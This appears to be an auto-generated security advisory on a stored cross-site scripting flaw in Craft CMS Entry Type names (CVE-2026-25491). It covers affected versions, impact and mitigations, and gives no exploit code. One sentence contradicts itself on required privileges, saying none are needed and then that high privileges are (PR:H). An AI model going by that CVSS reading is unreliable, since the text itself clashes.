CVE-2026-25491 is a stored cross-site scripting (XSS) vulnerability identified in Craft CMS, a popular content management system used for building digital experiences. The vulnerability exists in versions from 5.0.0-RC1 through 5.8.21. Specifically, the flaw is due to improper neutralization of input during web page generation (CWE-79). Entry Type names, which are user-configurable labels within the CMS, are not sanitized before being rendered in the Entry Types list. This allows an attacker with authenticated access and high privileges to inject malicious JavaScript code into these names. When other users view the affected list, the malicious script executes in their browsers, potentially leading to session hijacking, unauthorized actions, or data theft. The vulnerability requires user interaction (viewing the list) and privileges to create or modify Entry Types, limiting its exploitation scope. The CVSS 4.0 vector indicates network attack vector, low complexity, no privileges required for attack initiation but high privileges are needed (PR:H), and user interaction is required (UI:P). The impact on confidentiality and integrity is low, with no availability impact. The issue was resolved in Craft CMS version 5.8.22 by properly sanitizing Entry Type names before display. No public exploits have been reported to date, but the vulnerability poses a risk to organizations relying on Craft CMS for content management.

For European organizations, this vulnerability could lead to targeted attacks against users with access to Craft CMS administrative interfaces. Exploitation could result in session hijacking or unauthorized actions performed in the context of a legitimate user, potentially compromising sensitive content or administrative controls. Although the CVSS score is low, the risk is elevated in environments where multiple users manage content and where attackers can gain or already have high-level access. The impact on confidentiality and integrity is limited but non-negligible, especially for organizations handling sensitive or regulated data. Disruption of content management workflows and potential reputational damage could also occur if malicious scripts are injected and executed. The lack of known exploits reduces immediate risk, but the widespread use of Craft CMS in Europe, particularly in media, education, and government sectors, means that unpatched systems remain vulnerable. Attackers could leverage this flaw as part of a broader attack chain, especially in targeted campaigns.

European organizations should immediately upgrade Craft CMS installations to version 5.8.22 or later, where the vulnerability is fixed. In addition to patching, implement strict input validation and output encoding for all user-supplied data, especially Entry Type names and other customizable fields. Limit the number of users with high privileges who can create or modify Entry Types to reduce attack surface. Employ Content Security Policy (CSP) headers to restrict the execution of unauthorized scripts in browsers. Monitor CMS logs for unusual activity related to Entry Type modifications. Conduct regular security audits and penetration testing focused on CMS components. Educate administrators and content managers about the risks of XSS and the importance of applying security updates promptly. If upgrading is not immediately possible, consider restricting access to the CMS administration interface via network controls or VPNs to trusted users only.